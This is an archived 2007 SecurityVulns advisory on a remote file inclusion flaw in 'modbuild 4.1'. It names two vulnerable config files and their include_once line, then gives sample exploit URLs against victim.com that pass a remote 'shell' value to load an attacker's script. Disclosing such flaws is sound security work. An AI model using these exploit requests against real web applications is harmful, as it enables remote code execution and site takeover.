modbuild >> 4.1 Remote File Inclusion

2007-04-28T00:00:00
ID SECURITYVULNS:DOC:16871
Type securityvulns
Reporter Securityvulns
Modified 2007-04-28T00:00:00

Description

modbuild >> 4.1 Remote File Inclusion

Affected Software .:
Download..: Risk ..............: high Date .........: 26/4/2007 Found by ..........: s433d_only_linux Contact ...........: s433d_only_linux@yahoo.de Web .............: Www.hackerz.ir special thanx ........... B4h4r3h_ir my best friend :x & ali jasbi

Affected File: oneadmin/config-bak.php include_once($path["docroot"]."common/include.php"); oneadmin/config.php include_once($path["docroot"]."common/include.php");

Exploit: http://victim.com/oneadmin/config-bak.php?include_once=shell? http://victim.com/oneadmin/config.php?include_once=shell?